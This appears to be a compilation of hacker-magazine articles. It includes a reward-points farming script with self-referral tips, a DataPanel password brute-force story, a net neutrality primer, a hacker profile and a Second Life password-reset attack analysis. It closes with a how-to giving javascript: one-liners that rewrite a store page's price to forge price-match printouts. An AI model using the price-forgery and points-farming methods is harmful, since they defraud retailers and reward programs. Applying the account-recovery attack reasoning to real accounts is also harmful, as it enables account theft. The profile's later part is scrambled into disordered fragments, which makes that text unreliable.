Send {left}
; Launch the browser
Run iexplore.exe
WinWait, Internet ; Change Internet to the name of your browser
; Click in the Scour toolbar: use the Active Window numbers from Window Spy
Click 130, 111
Send ^v
Send {Enter}
Sleep 10000
WinClose
}

That's it. You can also make it repeat as many times as you want (remember, 500) by changing the loop count. I would recommend throwing in some "real" searches with comments. That will make your account activity appear more genuine and, who knows, you may actually start to like the social searches.

To get points from your "referred friends," they need to be in your contacts for either Gmail, YahooMail, MSN, or AOL. If you are like me and have several email addresses, you can refer yourself. There are bonus points for referring people. I got 200 points for inviting 2 friends, but think that is a max. So set up one or two more, and use the script on their accounts. I still need to test the MLM-type points and will update with a letter if I get it to work. Lastly, other than the gift card, you can gain some (albeit minor) scripting and process automation knowledge.

Battling the Fanuc DataPanel
by scamorama

The following is true. No names were changed, because no one is innocent.

Monday

The task appeared simple: replace a database on a GE Fanuc 1062 DataPanel using GE's proprietary WinCFG software running on a laptop. The DataPanel was in the Control Room, and would be used to replace a failed unit at a remote location. Save a copy of the existing database. Use Communication Protocol 80: Modicon Host Slave in the new database. No problem, right?

First off, there was the need for the software. Was there a copy onsite? Of course not. Did anyone have one? Of course not. Was it available from GE? Sure, if one had a Customer Identification Number. Could I get one? Sure, if I didn't mind waiting an hour. But it was only an hour.

Was it all going to be this easy? Of course not. In order to transfer files, the DataPanel needed to be in "Host Transfer" mode. To get into "Host Transfer" mode, one needed to be in "Off-Line" mode, which required a password. Did anyone know the password? Of course not. Was there a default password? Not that GE would say. Was trial-and-error an option? It was now. The passwords are numeric, and the range is 000000-999999. Got it at 111.

With the DataPanel in "Host Transfer" mode and the laptop connected, it was time to transfer the existing database for safekeeping. I started the transfer and received the error message: "Cannot Initialize Port". Pathetic poking and probing at port and program produced piffle. Took a closer look at WinCFG (the name alone should have warned me) and saw "Windows 95, Windows 98, and Windows NT". The customer's locked-down Windows XP Professional laptop was not going to allow it to communicate. Was there a suitable laptop onsite? Of course not. Did I have my 600X with me? Of course not. I couldn't connect and test the DataPanel until the following day.

Tuesday

Brought in my ThinkPad 600X (running Win98SE) and installed WinCFG. Connected it to the DataPanel, put it in "Host Transfer" mode, and was elated to see the progress bar. Everything looked good. With the original database safe on the 600X, it was now time to put the new one in its place. I opened the database, configured it to use Communication Protocol 80: Modicon Host Slave, as I was told, and saved it. I opened the transfer window, selected the new database, and checked the communication protocol to see that it matched. I started the transfer and got the error "Database Type Does Not Match DataPanel Type". Was I surprised by this? Of course not. I tried to RTFM, but the FM was no F good.

Before I continue, a few words about the user manual. It appeared to have been translated from the original Sanskrit by an Urdu-speaking Italian. This was obviously the product of a technical writer, someone who knew a lot about software, but little about English. There were no screenshots of what one might expect to see, no examples of how to perform any task, and only the most minimal of glossaries. Consulting it for guidance on any topic was an exercise in masochism.

After a few dead ends, I made an interesting discovery. It turned out there are two flavors of a 1062 DataPanel: vanilla (1060/1062) and pecan (1060/1062 Extended Memory). I had a vanilla database and a pecan DataPanel. The manual said, "You can modify an existing database for a different DataPanel." Did it tell me how? You needn't ask. Did the manual give any clue? Silly question. Poking around in WinCFG revealed that, if the database was open, the "Save As" function provided the needed selection. Initiated the database transfer. No error message! Had I won? Of course not. No progress bar. No transfer. Rebooted the DataPanel. Started the transfer. It worked! Was I finished? Of course not. Took the panel to its new home and hooked it up. Turned the power on. It looked good when it came up, but (you knew there was a "but" coming, didn't you?) nothing on it worked. No output to the PLC.

Wednesday

I sat back and considered what was in front of me. I had a good database, and I'd configured it with the Communication Protocol requested by the customer. Is the customer always right? Of course not. I opened the Communication Configuration in WinCFG and looked at the available choices. Found Protocol 91: GE Fanuc Genius. Seemed a logical starting point. Configured the database with Protocol 91 and transferred it. Restarted the DataPanel and got the same result as the day before. More digging was required. Poked and peeked in the selections to see if there was a way to generate a report on the database showing the input/output addresses. Did I consult the manual? Of course not. After a few more dead ends, I managed to come up with a way to get a report. I actually got a usable report, which showed that, indeed, the database had the addresses it needed. Good news: the old database had a page that duplicated the new database. Bad news: the page had inputs only, no outputs. Was I ready to give up? Of course not. Transferred the database that I knew was good and that had the requested protocol. Restarted it and was surprised to see that the old database could communicate.

Thursday

Copied the database that I had checked the previous day to the 600X. Connected it to the DataPanel. While doing this, I made an interesting discovery: DOS could be entered directly from the DataPanel access screen. I booted the DataPanel into DOS. No database file on the C: volume. Did anyone know where it was? Of course not. Was there another volume? You bet! The database was on D: (I, rather stupidly, assumed that WinCFG was smart enough to know where the file was). Changing the extension on the database file on D: to something other than what was normally expected resulted in the DataPanel booting directly into "Off-Line" mode. So much for password security. Booted the DataPanel into DOS and deleted the now-suspect database. Copied the database file to C:. Rebooted the DataPanel and put it into DOS mode, renamed the new database file, and copied the old database file from the C: volume. I installed WinCFG on the desktop I'd been using, rebooted the DataPanel, and opened the database I had installed. It worked. Was I out of the woods? Yes. But was it all good? Of course not.

Network Neutrality Simplified
by linear, United Phone Losers, http://www.phonelosers.org

Intro

Over the past few years, the media attention that network neutrality once garnered has all but faded away. However, the threats to net neutrality are still very real, and these threats are putting the future of the Internet as we know it in danger. Since it is important that we don't let this issue (along with the beloved Internetz) fade away, I wanted to offer this quick, very basic primer on net neutrality: what it is, where we currently stand, and where we go from here.

What It Is

One day in the not-so-distant future, you'll fire up your DSL connection, open your web browser (well, the browser of choice as determined by your ISP) and start browsing the net, but unfortunately, there's not much browsing to be had. Your ISP, acting as a gatekeeper to the Internet, has determined which sites and services are going to be available to you. Maybe you want to catch up on the latest news and find out what's happening around the world. Fox Entertainment Group has paid a hefty sum to your ISP, making Fox News the exclusive provider of news to all subscribers of your ISP. Don't want your news delivered by Fox? Better shop around for a new ISP that has been paid off by a different news organization. Of course, there's probably only one telephone company in your area to offer DSL, and the cable Internet alternative doesn't have much better service plans either (or maybe offers much worse!). It doesn't stop at just news. The search engine you use, your email provider, social network, image/multimedia sharing community, etc., will all be determined by your ISP. What about those private, independent, and/or personal websites (like 2600.com, phonelosers.org)? Well, those websites can't afford to pay big money to your ISP, so they'll be served to you a little more slowly, if your ISP decides to serve them to you at all. Or maybe your ISP has set up a tiered pricing plan, where how much you're willing/able to pay each month determines what you have access to (similar to cable/satellite television: the more you pay, the more channels you get). Sounds like a terrible vision of Internet-future, doesn't it? Well, the concept of network neutrality is what prevents this sort of scenario from happening.

The phrase "network neutrality" is a (relatively) new term for an old concept: no one should be able to regulate, control, or discriminate against content or traffic. The Internet user should decide what sites he or she visits, what services are used, what applications they want, and how the user is able to connect. And when I say the concept is old, I mean it predates the Internet itself, as far back as the late 1800s. The concept was applied (and federally mandated) to the telegraph service. This made it so that, regardless of where a telegraph came from, who it was going to, or what its contents were, all telegraphs were sent impartially and in the order they were received. This also applies to parcel shipping services, the telephone network, and all common carriers and public utilities.

Where We Stand

In 2005, the FCC changed the classification of DSL and Internet services connected through the phone network. Since DSL and dialup Internet connections operate through the phone lines, they were initially subject to the federally mandated net neutrality concept that the rest of the telephone network was subject to (cable modem Internet services have, oddly enough, been exempt all along since they did not operate via the phone network). The reclassification effectively made these networks exempt from network neutrality. This opened the door for telecommunications companies and broadband providers to start scheming about how they can provide service to their users in a way that benefits them the most (primarily in the financial sense). Not only is this sleazy, but it is a direct betrayal of these companies' obligation to the consumer.

Meanwhile, the telecommunications lobby, cable Internet companies, and telecommunications providers in general are busy feeding misinformation to anyone who will listen. They're going so far as to set up fake "grassroots" organizations to oppose net neutrality, such as Hands Off The Internet (http://www.handsoff.org) and NetCompetition.org (http://www.netcompetition.org). Both of these are conveniently funded by those companies that stand to benefit/profit the most from a lack of neutrality, are anything but grassroots, and serve solely to misrepresent what net neutrality is and what its proponents are trying to accomplish. Their intent is to prevent any attempt that would write network neutrality back into law, as it had been prior to 2005.

The issue has become a highly politicized one. Since the reclassification, numerous congressional proposals to enforce network neutrality have been made, and most of them have been defeated. Service providers' and the FCC's legal roles still have not been clearly defined. The debate rages on, and we are certainly not in the clear.

Is This Really A Threat?

Certainly. Already we are seeing big business taking advantage of the consumer. As a very real example, consider the fairly recent (October 2007) attempts of Comcast to prevent traffic generated by its customers through BitTorrent. This restriction was not limited to material thought to be in violation of copyright laws, but all BitTorrent traffic, including legal use. Customers were not informed of these attempts. Not only did this violate network neutrality but, without providing a means for the consumer to be aware of what to expect when purchasing services, it also subverted the notion of a free market (a free market can not regulate itself without an informed consumer, especially when they're uninformed against their will). This certainly is not the only example of an ISP abusing its power. Comcast is one of the major, most vocal opponents of network neutrality. The company has gone so far as to (admittedly) underhandedly block members of the general public (many of whom had gathered to speak against the company) from FCC hearings regarding Comcast's actions against its users. Comcast understands what the general public wants, but is trying to make sure that the decision-makers don't hear the public voice.

Now What?

If you weren't already familiar with the concept of network neutrality and the threats against it, then I apologize for being the bearer of bad news. The good news is that it's not too late, and we can still help shape the outcome of the battle in a way that's favorable to the future of the Internet and to us as consumers. It might be a hard battle, but it's a battle we can win. The numbers are clearly in favor of an Internet that is free and open. Here are just a few examples of what we can do to help ensure that we win the fight:
• Contact your elected officials and make sure they support legislation in favor of network neutrality, such as the "Internet Freedom Preservation Act 2008" (H.R. 5353).
• Sign petitions in order to ensure those making decisions understand public opinion on net neutrality, like the one found on the SavetheInternet.com Coalition's website.
• Spread the word about network neutrality and counteract the misinformation campaigns of big business!

Other Resources

If you'd like to learn a little more and keep yourself up-to-date on the events surrounding the network neutrality debate, here are some websites I'd recommend as a starting point:
• SavetheInternet.com Coalition, http://www.savetheInternet.com: A coalition in favor of network neutrality that is not funded by any corporation, trade group, or political party, representing consumers, grassroots organizations, and businesses in favor of network neutrality.
• Open Internet Coalition, http://www.openInternetcoalition.com: Not surprisingly, the Open Internet Coalition includes big names such as Google, eBay, Skype, PayPal, and more (some of those in the world of big business understand that a lack of net neutrality doesn't only hurt the consumer, but the market as well).
• A Guide to Net Neutrality for Google Users, http://www.google.com/help/netneutrality.html: Google discusses its support for network neutrality.
• H.R. 5353 Internet Freedom Preservation Act of 2008 on OpenCongress, http://www.opencongress.org/bill/110-h5353/show: In-depth discussion and analysis on H.R. 5353, the act in favor of network neutrality.
• http://en.wikipedia.org/wiki/Network_neutrality and http://en.wikipedia.org/wiki/Network_neutrality_in_the_United_States: User-contributed/edited entries regarding the debate.

Closing and Obligatory Greetz

Free nawleed! I'll see you on the open, free, people's Internet.

Shout Outz: bex0, RogueClown, murd0c, Altalp, Phractal, s1acker, vixen, nova, jenn, graphix, rbcp, Rob T Firfely, the phonelosers forum users, and the old school UPL and f0ur0ne0ne (RIP) crew.

Hacker Perspective
Virgil Griffith

Hi. My name is Virgil Griffith. I am 25 years old and live in Pasadena, California. I study theoretical neuroscience at the California Institute of Technology and am in my second year of graduate school. My day job and career is science, but I'm not here to talk about that. I am here to talk about a creative, artistic enterprise called hacking: my experiences with it, what it is to me, and to share some observations about our little community that I never hear anyone talk about.

Some background about me. I was born and raised in Alabama. Unlike many hackers I know, my family got its first computer when I was seven. It had a 33 MHz processor, 120MB hard drive, and a fancy 2400 baud modem. I didn't immediately fall in love with programming; I liked playing video games and especially finding counterintuitive abuses in the rules to give myself an edge. I loved the ingenuity that goes into trying to think of the most perverse things you can do within the game that the designers would have never foreseen someone trying. This slowly extended into writing scripts within games to perform common tasks more quickly, but it was the search for the most advanced, insidious ways to get an edge on the online competition that brought me to the security mindset, and soon I was noticing compromising blemishes in all sorts of social and technological systems.

In my senior year of high school, I subscribed to 2600 Magazine, and in every issue I understood two or three articles well enough to re-implement them or clean up any minor defects in their technique. At 17 I attended my first hacker conference, H2K, in New York. I understood almost none of the talks, but I made up for it by taking page after page of useless notes. Later that year, I graduated high school, enrolled at the University of Alabama, and met Douglas Hofstadter, the author of Gödel, Escher, Bach: An Eternal Golden Braid, a profoundly sublime book I read in high school.

I was inspired by an article in this very magazine entitled "CampusWide Wide Open" by Acidus. It was about flaws in the Blackboard Transaction System, the card access system used at most college campuses nationwide. The article made complete sense to me and I felt it could have deep ramifications. At a local hacker conference in Atlanta, I met Acidus, a.k.a. Billy Hoffman, a sophomore at Georgia Tech. We started up a collaboration to fully flesh out and implement the ideas in his paper. Seven months later, in April 2003, I was excited to give a security talk together (my first), but hours before our talk we were served a temporary restraining order from Blackboard Inc., the maker of the campus card system. This was followed by a civil lawsuit two days later stating that our investigating the flaws in their system was, in fact, illegal. We were woefully unprepared. The suit didn't go so well, and we settled out of court under sealed terms. I feel we were completely in the right, but legal courts do not favor who is right. They favor the prepared. Oftentimes they don't even favor who is on the right side of the law. Hopefully, you all can learn from this: talk to a lawyer before you get too deep into your project. Although, judging from the recent history of hacker cases, it's unlikely you'll go to jail for trying to do a good deed. But unless your case is legally unassailable, the company will outspend you, successfully stop you, and your case will simply become yet another one of the many cases that fail to establish any useful precedent.

Anyway, at this point administrators at both of our universities were more than pissed at us for causing a ruckus. I was politely encouraged to leave. So I did. I dropped out of school and moved to Indiana without a job or studentship. I somehow convinced one of the professors at Indiana University School of Informatics to give me a job doing computer security research. While there, I did a cute data-mining project that cross-referenced birth and marriage records across the state of Texas to automatically discover Mother's Maiden Names (as far as I can tell, not even bank employees know why it's still used as a security question). I called it "Messin' with Texas." The ease and influence one had simply by merging databases and running some dead-simple analyses inspired me. Throughout my sophomore year, I started thinking up more projects in this vein which I began to call "data-mining as an offensive weapon." The idea is simple: 1) take a known security vulnerability

[...] merely picking off the lowest of the low hanging fruit is so easy, yet has huge impact. An attack that works against .mil from nothing more than a search query (ext:doc site:.mil inurl:aa) is the same idea. Around then, I read about an IP address deleting unflattering facts from congressmen's Wikipedia pages and upon manually tracing it back discovered it was in fact registered to the House of Representatives itself! Shortly afterwards, I took one database listing anonymous Wikipedia edits by IP address and another database which listed the registered owner for a given IP address, searching for ways they could play off each other, synergistically amplifying their power. Users could then type in a company and see every anonymous edit that company had made from their offices. Now that was fun. Since then, I've worked on several projects such as extending WikiScanner to catch organizations hiding behind registered accounts (Poor Man's Check User).

For me, hacking is an art form. Hacking is picking out the counterintuitive. Hacking is art upon the canvas of the living, breathing, sprawling, ever-changing, unbalanced systems spiraling out of normal control, whether Starcraft or the stock market. Creativity conjoined with technological know-how is the tool of choice. My paramount goal is shaping the world for the better, and second a delightful open-ended game.

I genuinely enjoy language. Labels of subcultures invariably come to mean different things to different people. And, despite the minor confusion, it's all just fine. There are many, many other deeper and fulfilling things to do with their time than insisting a certain charming yet nebulous H-word should only be used to describe people in Group A and never people in Group B. Sometimes people say they're into hacking just for fun. The myriad self-described hackers I've met are typically:
• The investigative journalists of the online world.
• Playful jokesters: anyone who enjoys anything remotely technical solely for the sake of it, with shades of Loki-like pranksters, but occasionally Chaotic Neutral.
dapper trenchcoat wearers. After all of this. So. everyone reading this magazine has much more exciting. hacking is first a means to an end. I wrote a simple tool. and the word “hacker” is no exception. It spans the gamut from the most incendiary .take Go. after three years of science and online hijinks at Indiana University.cyber-criminals . It was a bountiful harvest of public relations disasters for disinformers across the globe. bringing military-strength anonymous publishing to the Internet. If all I wanted was an entertaining. it was discovered that two congressmen had actually hired staffers to police their pages. Hacking is the only game that permits even casual players to influence
What Hacking Means to Me
. 2) do it to the entire Internet. I’d play Magic: The Gathering and be done with it. and shifting the course of the whole complex to do something completely unexpected. I honestly I have no idea why more people still don’t use data-mining as an offensive weapon . For me personally. deeply interwoven technological and social systems that make up modern life. but really. open-ended game that required substantial time investment. that took two databases: the database of all Wikipedia edits. for some time everyone has known about Microsoft Word documents containing metadata about recent changes and who made them. as well as forging a conduit between the Tor darknet and the World Wide Web (tor2web). interesting. • People with balls of fucking steel. complex. • People whose mastery of technology has given them disproportionate influence on the Internets. WikiScanner. • Chaotic Good. seldom-explored parts of these systems.some of it quite naughty. more elegant games people play for fun .mil inurl:ab.. I graduated and entered graduate school here in California.mil that Google knew about (ext:doc site:.VOLUME 26
ability.0001 percent of a very big number is a big number. • People for whom almost every social problem has an engineering solution. . • Vigilantes to the extent allowed by law - empowering the good and punishing the bad. In 2007. I look forward to future work to help make the Internet a better place.) and used known techniques to reveal recently deleted text . instead of prescribing a definition. For example.mil inurl:ac. but they’re just being modest. The embarrassment these congressmen rightly deserved was simply delightful and I wondered how hard it would be to automate the entire process over all of Wikipedia. So I downloaded every Word document from . and intrepid open-source developers somewhere in between.

At a given moment. an obscure but handy database. But the differences look big only because the comparison is made under a magnifying glass.
then let us know and we will try to entice them into writing the next Hacker Perspective! Email us at articles@2600.
Phillip Torrone
Martin Eberhard
. Just like you. will “fix the problem” or otherwise insulate themselves from it. but nothing to shout from the rooftops. I’ve never heard anyone publicly talk about it.has some strikingly unusual etiquette that the newcomers never get at first. You stop benefiting from them. but it’s 100 percent honest so it has to be worth something. and they stop benefiting from you.
Hacker Perspective is a regular column featuring the views of various luminaries known to the hacker community and oftentimes the mainstream as well. Early career hackers sometimes forget to aspire to something truly novel and great. peoples’ moral intuitions occasionally disagree. hackers spend most of their time looking for the perfect mates for their half gems in hopes of creating that truly novel thing that blind-sides the entire world with its originality and strength. the essence of hacking is the quest to craft the most perfect disruptive gem that changes everything for the better. Disruptive Technologist Virgil Griffith has balls of fucking steel and is known for developing the WikiScanner software. If you blog-narc.a minor unpublished vulnerability. people will stop sharing their half gems with you. In the past. On a day to day basis. a clever new trick. We just happened to be born with a penchant for technology and coloring outside the lines. but unfortunately they can’t share their half gems with everyone. Is there a person you’re aware of who is a known entity and has made a noteworthy accomplishment of some sort that would be recognized by the hacker community? Do you feel this individual would have something of interest to say about what it means to be a hacker? If so. I wish to thank StricK for being the greatest hacker mentor and friend a boy could ever have and without whom I would not be writing this today. Backing out.(sometimes even altering the course of) entities far bigger than them including corporations. Something that’s mildly interesting on its own. I also wish to thank Emmanuel Goldstein for being the spiritual leader of this whole shebang and raising an entire generation of disruptive technologists.com with details.or at least the small slice of it I live in . a little known surprising fact. and I think it sheds light on what motivates hackers. a new twist on an old technique. This is what hacking and the hacker culture is to me. 
but by and large they see eye to eye. industries. you can’t help but notice the “Hacker Perspective” articles are all quite different. A truly original work of art almost inevitably requires finding two or three half gems that play off each other in just the right way. a hacker knows of between five to 15 “half gems” . And their desire for even small media attention prods them into prematurely publishing ideas on their blog that their friends have been tossing around. If you’ve read this magazine long. we’re all cut from the same idiosyncratic. Within the community. Of course. It’s just worse for everyone all the way around.
Hackers would rather share. we’ve featured commentaries from:
The Cheshire Catalyst, Bruce Schneier, Phiber Optik, Barry Wels, Nick Farr, Bre Pettis, Mitch Altman, Rop Gonggrijp, Bill Squire
We want this list to grow even bigger. variegated feeling cloth like everyone else. and the half gem is gone. It’s the massively multi-player online RPG with a vibrant rich world and complex history that you play in real life. I don’t know how representative any of it is. and governments.

MacOS X.
Case Study: Second Life
Motivation for Attack
The attacker has motivation. By clicking the included URL. Finally. and then I sell the in-world money I earn for US dollars on the Lindex currency exchange (http://secondlife. but I immediately got concerned. collaboration. allowing me to bypass the need to have access to my email account altogether. This account represents my entire real-world income (from sales and contracting work). is a multi-user. Gaining access to my account would let an attacker steal my profits. The next page contains the security questions. interactive. p h p ) involves several steps. regardless of the settings on the account in question. Fortunately. I hope your security sense is tingling. I also conduct a fair amount of business in-world for real-world money. this option is only available to IP addresses that have previously successfully logged into the account. I’ve been an avid member of SL for over three and a half years and most of my time in-world is spent on scripting and building. which they could then transfer to a friend’s account and sell.THE HACKER DIGEST . The system emails a one-use URL with a randomly generated code to the email account on file and tells the user to check their email. Some sites will email your password to you in plain text. By ensuring that you provide correct answers to the questions. All of the information I will provide is already wellknown in the community and trivially accessible to motivated attackers. and the system trusts that you should be allowed to reset your password. Users have no set goals. First. or a targeted attack? I knew
one thing: an attacker would have plenty of motivation to take over my account. I got an email from LL that disturbed me. The website also provides another option: “Email no longer active? Click here!” It scared the crap out of me during my tests to see that the “secret” URL was plainly presented to me in that link. Not only have I built up an identity in SL. 3-D virtual world in which users can create an incredible variety of content. open-ended. so what are the potential attack vectors? The password retrieval process for an SL account (https:// ➥ secure-web0. I’m told the third
Attack Vectors
. you “prove” that you’re the owner of your email address. Second Life (SL). but instead use the world for socialization. What did the email say? Why was it in German? Who wanted to access my account? Was it random. the website can perfectly verify your identity to ensure that unauthorized parties are not trying to steal your account. Recently. they could take my products and distribute the source code. so I’m very serious about protecting its security. and many other applications. potentially costing me a huge number of sales and doing irrevocable damage to my business. This email is sent in the language of the requester. and it had the subject line “Mein Konto: Kennwortanfrage” which I think translates to “My Account: Password Assistance”.com/currency). It would also allow them to use my credit card on file to buy more in-world currency. A user must successfully answer one of four questions in order to verify their identity. The first question is the secret question the user answered when they created their account.com/ ➥ a c c o u n t / r e q u e s t . available at http:// ➥secondlife. In this article. 3-D modeling. It was in German. others are told to call LL to reset their password. and asks them to provide the first names. I’ll explore the insecurity of these systems through a case study. Many users will ignore such a spurious email. Access to the world is through a standalone client that runs natively on Windows.VOLUME 26
Second Life Hacking
By Lex Neva
Password retrieval systems are ubiquitous on the web. the user visits the website and tells it that they forgot their password. Second. effectively stealing money from me. a language I don’t speak. while others will quiz you with inane “security questions” that you answered when ayou signed up for the account. the system provides the last names of four people the user has added to their “friends list” in SL. art.com/ and created by Linden Lab (LL). It was one of those emails that the service sends you when you tell them you forgot your password. and Linux. I sell products in SL.secondlife. Usually they consist of a link on the login page labeled “Forgot your password?”.

This change is pretty inconvenient for me. I was chagrined to find that my representative knew of no way for me to disable the web-based password recovery system for my account. How can an attacker bypass these security measures? First. they can try to deduce my home location. and searching the web for logs of any conversations I might have been in. An attacker could deduce who might be on my friends list by looking at the membership lists of the groups I’m in.schneier. I could also remove everyone from my friends list. For most users. We had a pretty interesting talk about security. A system is only as secure as its weakest measure.secondlife. SL severely limits where I can set my home location. Since my attacker is in Germany. the attacker is now looking at the page with the security questions. I’ve changed my password. looking in my profile for mentions of friends. Barring that. but I can’t help but feel it’s a worthless exercise. Dan Kaminsky just showed us how an attacker can intercept emails using his DNS cache poisoning vulnerability. In response. The attacker has only three tries. It goes back to an incursion into LL’s systems in 2006 (http:// ➥blog. I called immediately to have my account unblocked and. this is going to be a region in which they own land. In my case. but I found in my tests that they can reload the page as many times as they want without penalty until they get a list of names they know. which would prevent that question from appearing on the questions page at all. assuming the other phone representatives pay attention to that. thanks). right? Chillingly. While it’s often easy for an attacker to discover the answer to a secret question (a good essay about this is here: http://www. or they could hop on my wireless if I was unwise enough to leave it unsecured. they must either intercept the email or come from an IP previously associated with the account. Only one of these questions must be successfully answered to gain access to the account.
neither of these is an option. my home location was trivially obvious when looking at my profile.com/blog/ ➥archives/2005/02/the_curse_of_ ➥th. Many users no longer had access to the email address associated with
Mitigation
Why This System?
. and they took the obvious step of immediately blocking all access to my account (gee. This was a sensible reaction. but I feel I have no choice. The friends list might be fairly easy to guess because user surnames. I’ve shown that it’s completely feasible for someone to compromise my account. What’s especially interesting is that LL is. I think that the correlation in time between Kiminsky’s talk and the attack on my account is unlikely to be a coincidence. so this is not a feasible mitigation strategy. and it’s easy to find this information using SL’s search system. Logins via the SL client use SSL to avoid transmitting the user’s password hash in the clear. How can I mitigate this threat? I’ve changed my home location to a less guessable place. and the user has 3 attempts before their IP is blocked from the password reset system. LL quickly published details about the attack and invalidated all user passwords.VOLUME 26
option is to provide the exact value of the last payment the user made to LL.html). this would make an already unmanageable user interface even more hostile.doxpara. and I set up a recognition phrase that I must provide in future calls to verify my identity.
What’s especially interesting is why this insecure password recovery system was first put in place. a security-conscious company. but this option was not presented to me because my account is not charged monthly fees. ➥com/?p=1204). in general. are fairly unique inside communities in SL. which are chosen from a long list. other than my own land. they’ll skip right past that and the last billed amount and look at the friends list and the home location. so they’ll have to intercept my email. thankfully. the representative did this for me. In SL. but it meant that thousands of users were thrust upon the mercies of the password recovery system. With that out of the way. They escalated my ticket to find out for sure. and they recommended I change my password. To do this. The final option is to provide the name of the region that the user has set their home point to. in which a large number of password hashes were believed to have been stolen by attackers. and I’ve received no assurances that LL’s resolvers have been patched against Kiminsky’s vulnerability. they must gain access to the page with the security questions. It might be possible to luck into my IP address if they’re using the same internet service provider as I am.com/2006/09/ ➥08/urgent-security-announce ➥ment).THE HACKER DIGEST . Impossible. but. This had the side-effect of freezing my business. I opened a support ticket with LL to let them know how worried I was about those emails I got. and they could do it in a way that I would be unable to detect (read the slides http://www.
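The friends-list challenge discussed above, hardened, as an added example that is not part of the original article (Python, constructed names and a made-up server key): the four surnames shown are derived from an HMAC over the account name and the reset token, so reloading the page yields the same four names instead of a fresh sample, and failed answers count against the account rather than the client IP.

```python
"""Hardened friends-list challenge for a web password reset.

Constructed example, not Linden Lab's code.  It models the question the
article describes (four friends' surnames shown, their first names required)
and fixes the two weaknesses found in testing: reloading the page re-sampled
the list without penalty, and the attempt limit was tied to the client IP
rather than to the account under attack.
"""
import hashlib
import hmac
import random
import secrets
from dataclasses import dataclass
from typing import Dict, List, Tuple

Friend = Tuple[str, str]  # (first name, surname)


@dataclass
class Account:
    name: str
    friends: List[Friend]
    failed_answers: int = 0
    locked: bool = False


def weak_sample(account: Account, k: int = 4) -> List[Friend]:
    """The behaviour the article observed: every page load draws a fresh
    random sample, so an attacker who keeps reloading eventually sees the
    whole friends list and can wait for names they recognise."""
    return random.sample(account.friends, k)


class ResetChallenge:
    """Reset-request state kept server-side; one instance per service."""

    MAX_ATTEMPTS = 3

    def __init__(self, server_key: bytes):
        self._key = server_key                      # secret, never sent to the client
        self._tokens: Dict[str, str] = {}           # reset token -> account name
        self._accounts: Dict[str, Account] = {}

    def register(self, account: Account) -> None:
        self._accounts[account.name] = account

    def start(self, account_name: str) -> str:
        """Issue an unguessable token identifying this reset request."""
        token = secrets.token_hex(16)
        self._tokens[token] = account_name
        return token

    def sample(self, token: str, k: int = 4) -> List[Friend]:
        """Pick k friends deterministically for (account, token).  Reloading
        the page returns the same k, so reloads no longer walk the list."""
        account = self._accounts[self._tokens[token]]
        seed = hmac.new(self._key, f"{account.name}:{token}".encode(),
                        hashlib.sha256).digest()

        def rank(friend: Friend) -> bytes:
            return hmac.new(seed, "/".join(friend).encode(), hashlib.sha256).digest()

        return sorted(account.friends, key=rank)[:k]

    def surnames(self, token: str) -> List[str]:
        """What the reset page shows the requester."""
        return [surname for _, surname in self.sample(token)]

    def answer(self, token: str, first_names: List[str]) -> bool:
        """Verify the first names in the order the surnames were shown.
        Failures count against the account, not the client IP, so changing
        addresses does not buy more guesses; the account locks after
        MAX_ATTEMPTS and must be recovered out of band (e.g. by phone)."""
        account = self._accounts[self._tokens[token]]
        if account.locked:
            return False
        expected = [first for first, _ in self.sample(token)]
        ok = hmac.compare_digest(
            "\x00".join(n.strip().lower() for n in expected).encode(),
            "\x00".join(n.strip().lower() for n in first_names).encode(),
        )
        if not ok:
            account.failed_answers += 1
            if account.failed_answers >= self.MAX_ATTEMPTS:
                account.locked = True
        return ok
```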

finding a good price for an item usually involves the use of scissors and a large stack of Sunday newspaper ads. LL created a special phone line with extra staff to handle password resets. and the employee says that they will match any major retailer’s price on a flyer or webpage printout that is not more than a week old. I find that the lowest anybody is selling the drive for. This stands for the Hypertext Markup Language Document Object Model. until then. They also added new identity verification options to the web-based password recovery system. it is still not low enough for my taste. it is critically important to provide users with a method of disabling it. but to modify the situation to suit your needs.
The concept:
Another concept:
Casing the joint:
into the URL bar on any page. I have no options to increase my security and prevent this attack. Best Buy included. One of the simplest examples is to type
javascript:alert("Hello World!");
Final Thoughts
Exploiting Price-Matching through Javascript Injection
By Sigma
In today’s world of retail shopping. I walk into a Best Buy that is located in a mall near my house. When paying for an item. If it is deemed necessary to implement an automated password recovery system. but I notice that the current price is $169. but they solved the problem by severely diminishing the security of the system as a whole. While perusing through the aisles. A popup containing this classic message should
. so they swallow their pride and honor the discount. I’m nervous.THE HACKER DIGEST . Worse yet. There still seems to be no way to disable the password reset system entirely for an account. But a system like SL gives an attacker the motivation and means to cause irreparable financial damage. and potentially powerful. Ever notice how those fancy lightboxes expand to fit their content when you click a picture? Those smooth growth actions are provided by the HTML DOM in JS. it’s no big deal if an account gets compromised. Quite easy to do. JavaScript has a handy little feature called the HTML DOM. LL was wise to identify and respond to the breach so quickly. We all obsessively follow deals to find the most opportune time to swoop in and buy what we want before the sale ends and the price returns to normal. But for many out there who have better things to do with their time. On the opposite end of the spectrum is JavaScript Injection. If I am stupid enough to forget my password. Stores will adhere to this because they don’t want customers to go to a competitor’s store. that advertises the item at a lower price.VOLUME 26
their account.

Silvia (JS Password Domination) and A5an0 (JS Injection) for similar articles that I found after writing this. This is where the DOM comes in handy. No one expects that someone would forge the contents of a page to cheat a store. I type something like this into the URL field:
javascript:x=document.getElementsByTagName("span");for(n=0;n<x.length;n++){alert(n+"="+x[n].innerHTML);}
appear. they think of defacement and identity theft. 3.” He just glanced at the sheets and handed me my item.alert(). knowing the number of the tag I want to modify. picked the HDD off the shelf. Here we are assigning the variable ‘x’ an array. I was still able to save a good 110 dollars. (He just zipped his finger across the keyboard like he does this all day.innerHTML ). some common sense still applies. given the rapid fluctuation in electronics pricing. Now that the text of a webpage has been successfully modified.innerHTML=prompt(“Enter ➥ new text:”.) x=document. Props to Jacob P. the real con can begin.n<x.
Analysis:
New parts broken down again: 1.}
Let me break this down: 1.getElementsByTa ➥gName(“span”). I asked the cashier if they did price-matching (to act clueless). On this page.x[23]. in any webpage there are many different tags and many are ‘span’ elements.) alert().””). The information in this article is for lulz and to be used for educational purposes only. they ignore the possibility of exploitation. as opposed to a URL with http:// or ftp:// 2. Why was this so easy? I suppose it was that when people think of websites getting “hacked” (This is in no way a hack.n++){alert(n+”=”+x[n]. I printed it out along with a couple of pages from other sites. and got in line. but rather a little trick). I took notice of when the popup displayed the current price for the HDD and noted the number. Do not try to buy a laptop for $5. Happy hacking! you to type in the new text to display in the ‘span’ tag. In the end.) Anyway.
The Process:
<span class="Price4XL">$124.88</span>
Finishing the job:
javascript:x=document.getElementsByTagName("span");x[23].innerHTML=prompt("Enter new text:","");alert();
